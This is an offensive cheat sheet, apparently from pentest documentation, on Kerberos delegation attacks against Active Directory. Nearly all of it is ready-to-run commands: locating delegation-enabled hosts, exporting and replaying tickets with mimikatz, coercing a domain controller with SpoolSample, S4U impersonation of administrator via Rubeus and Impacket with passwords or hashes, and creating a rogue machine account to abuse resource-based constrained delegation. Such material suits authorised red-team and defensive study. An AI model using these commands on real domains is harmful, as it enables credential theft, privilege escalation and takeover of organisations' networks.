Delegation Attacks

Unconstrained Delegation

Host with unconstrained delegation stores TGTs of connecting users. Compromise host → steal TGTs.

Find

Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-DomainComputer -Unconstrained

ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "[email protected]" -w 'pass' "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName

Exploit

# On compromised host with unconstrained delegation
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt ticket.kirbi

Printer Bug (Coerce DC)

Force DC to auth to unconstrained delegation host:

.\SpoolSample.exe DC_HOSTNAME COMPROMISED_HOSTNAME

# Catch TGT
mimikatz # sekurlsa::tickets /export
# Use DC TGT for DCSync

Constrained Delegation

Account can impersonate users to specific services only.

Find

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo

Exploit — Rubeus

.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

Exploit — Impacket

impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/[email protected] -k -no-pass

With Hash

impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/svc_account -hashes :NTLM_HASH -dc-ip DC_IP

Resource-Based Constrained Delegation (RBCD)

Write msDS-AllowedToActOnBehalfOfOtherIdentity on target machine. Need: write access to target computer object + ability to create machine account.

Check MAQ (Machine Account Quota)

crackmapexec ldap DC_IP -u user -p pass -M maq

Create Machine Account

impacket-addcomputer DOMAIN/user:password -computer-name 'EVIL$' -computer-pass 'Password123' -dc-ip DC_IP

Set Delegation

impacket-rbcd DOMAIN/user:password -delegate-from 'EVIL$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write

Get Ticket

impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/'EVIL$':'Password123' -dc-ip DC_IP
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@target -k -no-pass

Quick Reference

Type	Find	Exploit
Unconstrained	`TrustedForDelegation`	Steal TGTs from memory
Constrained	`msDS-AllowedToDelegateTo`	S4U2Self + S4U2Proxy
RBCD	Write to computer object	Create machine + rbcd + getST

Documentation Index

​Unconstrained Delegation

​Find

​Exploit

​Printer Bug (Coerce DC)

​Constrained Delegation

​Find

​Exploit — Rubeus

​Exploit — Impacket

​With Hash

​Resource-Based Constrained Delegation (RBCD)

​Check MAQ (Machine Account Quota)

​Create Machine Account

​Set Delegation

​Get Ticket

​Quick Reference

Unconstrained Delegation

Find

Exploit

Printer Bug (Coerce DC)

Constrained Delegation

Find

Exploit — Rubeus

Exploit — Impacket

With Hash

Resource-Based Constrained Delegation (RBCD)

Check MAQ (Machine Account Quota)

Create Machine Account

Set Delegation

Get Ticket

Quick Reference